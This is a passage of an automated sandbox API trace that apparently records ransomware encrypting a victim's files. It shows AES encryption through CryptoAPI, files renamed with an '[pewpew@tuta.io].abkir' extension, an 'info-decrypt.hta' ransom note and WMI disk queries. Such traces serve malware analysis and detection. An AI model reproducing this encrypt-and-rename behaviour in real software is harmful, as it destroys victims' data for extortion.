(dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0178.701] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x24592f60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0178.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0178.701] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0178.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpFilePart=0x0) returned 0x9d [0178.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta", lpFilePart=0x0) returned 0x69 [0178.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0178.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x23986000, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x23986000, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x23986000, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0178.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0178.703] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpFilePart=0x0) returned 0x9d [0178.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0178.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), fInfoLevelId=0x0, lpFileInformation=0x36a0178 | out: lpFileInformation=0x36a0178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30)) returned 1 [0178.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0178.703] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpFilePart=0x0) returned 0x9d [0178.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0178.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0178.703] GetFileType (hFile=0x280) returned 0x1 [0178.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0178.703] GetFileType (hFile=0x280) returned 0x1 [0178.703] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x2e30 [0178.704] ReadFile (in: hFile=0x280, lpBuffer=0x36a05c8, nNumberOfBytesToRead=0x2e30, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x36a05c8*, lpNumberOfBytesRead=0x949ea9c*=0x2e30, lpOverlapped=0x0) returned 1 [0179.217] CloseHandle (hObject=0x280) returned 1 [0179.218] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0x66bae28) returned 1 [0179.219] CryptGenRandom (in: hProv=0x66bae28, dwLen=0x10, pbBuffer=0x376cfd8 | out: pbBuffer=0x376cfd8) returned 1 [0181.074] CryptImportKey (in: hProv=0x66bae28, pbData=0x3810e28, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f890) returned 1 [0181.074] CryptContextAddRef (hProv=0x66bae28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.074] CryptContextAddRef (hProv=0x66bae28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.074] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f190) returned 1 [0181.074] CryptContextAddRef (hProv=0x66bae28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0181.075] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x4, pbData=0x3810f08*=0x1, dwFlags=0x0) returned 1 [0181.075] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x1, pbData=0x3810ed4, dwFlags=0x0) returned 1 [0181.075] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3810f18*, pdwDataLen=0x949ea68*=0x2e40, dwBufLen=0x2e40 | out: pbData=0x3810f18*, pdwDataLen=0x949ea68*=0x2e40) returned 1 [0181.075] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3813d7c*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x3813d7c*, pdwDataLen=0x949ea70*=0x10) returned 1 [0181.077] CryptDestroyKey (hKey=0xb7f890) returned 1 [0181.077] CryptReleaseContext (hProv=0x66bae28, dwFlags=0x0) returned 1 [0181.077] CryptReleaseContext (hProv=0x66bae28, dwFlags=0x0) returned 1 [0181.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpFilePart=0x0) returned 0x9d [0181.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0181.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0181.679] GetFileType (hFile=0x27c) returned 0x1 [0181.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0181.680] GetFileType (hFile=0x27c) returned 0x1 [0181.680] WriteFile (in: hFile=0x27c, lpBuffer=0x3695914*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x3695914*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0181.681] CloseHandle (hObject=0x27c) returned 1 [0181.682] CoTaskMemAlloc (cb=0x20c) returned 0xb61608 [0181.682] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb61608 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0181.682] CoTaskMemFree (pv=0xb61608) [0181.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0181.682] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0181.683] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0181.683] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0181.683] IUnknown:Release (This=0xb51e34) returned 0x1 [0181.684] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x60277b0) returned 0x0 [0181.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0181.684] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6031040) returned 0x0 [0181.684] WbemDefPath:IUnknown:Release (This=0x60277b0) returned 0x0 [0181.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6031040) returned 0x0 [0181.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0181.685] WbemDefPath:IUnknown:AddRef (This=0x6031040) returned 0x3 [0181.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0181.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0181.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0x66cca98) returned 0x0 [0181.685] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0181.685] WbemDefPath:IUnknown:Release (This=0x66cca98) returned 0x3 [0181.685] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0181.685] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0181.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0181.685] WbemDefPath:IUnknown:Release (This=0x6031040) returned 0x2 [0181.685] WbemDefPath:IUnknown:Release (This=0x6031040) returned 0x1 [0181.685] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0181.685] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0181.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031040, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6031040) returned 0x0 [0181.685] WbemDefPath:IUnknown:AddRef (This=0x6031040) returned 0x3 [0181.685] WbemDefPath:IUnknown:Release (This=0x6031040) returned 0x2 [0181.685] WbemDefPath:IWbemPath:SetText (This=0x6031040, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0181.685] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031040, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0181.685] WbemDefPath:IWbemPath:GetText (in: This=0x6031040, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0181.685] WbemDefPath:IWbemPath:GetText (in: This=0x6031040, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031040, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031040, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031040, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031040, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031040, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0181.686] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0181.686] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0181.686] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0181.686] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0181.686] IUnknown:Release (This=0xb51e34) returned 0x1 [0181.687] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x6027750) returned 0x0 [0181.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027750, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0181.687] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027750, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x60310b0) returned 0x0 [0181.687] WbemDefPath:IUnknown:Release (This=0x6027750) returned 0x0 [0181.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x60310b0) returned 0x0 [0181.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0181.687] WbemDefPath:IUnknown:AddRef (This=0x60310b0) returned 0x3 [0181.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0181.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0181.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0x66ccc98) returned 0x0 [0181.688] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0181.688] WbemDefPath:IUnknown:Release (This=0x66ccc98) returned 0x3 [0181.688] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0181.688] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0181.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0181.688] WbemDefPath:IUnknown:Release (This=0x60310b0) returned 0x2 [0181.688] WbemDefPath:IUnknown:Release (This=0x60310b0) returned 0x1 [0181.688] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0181.688] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0181.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x60310b0, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x60310b0) returned 0x0 [0181.688] WbemDefPath:IUnknown:AddRef (This=0x60310b0) returned 0x3 [0181.688] WbemDefPath:IUnknown:Release (This=0x60310b0) returned 0x2 [0181.688] WbemDefPath:IWbemPath:SetText (This=0x60310b0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0181.688] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60310b0, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0181.688] WbemDefPath:IWbemPath:GetText (in: This=0x60310b0, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0181.688] WbemDefPath:IWbemPath:GetText (in: This=0x60310b0, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0181.688] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0181.688] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: 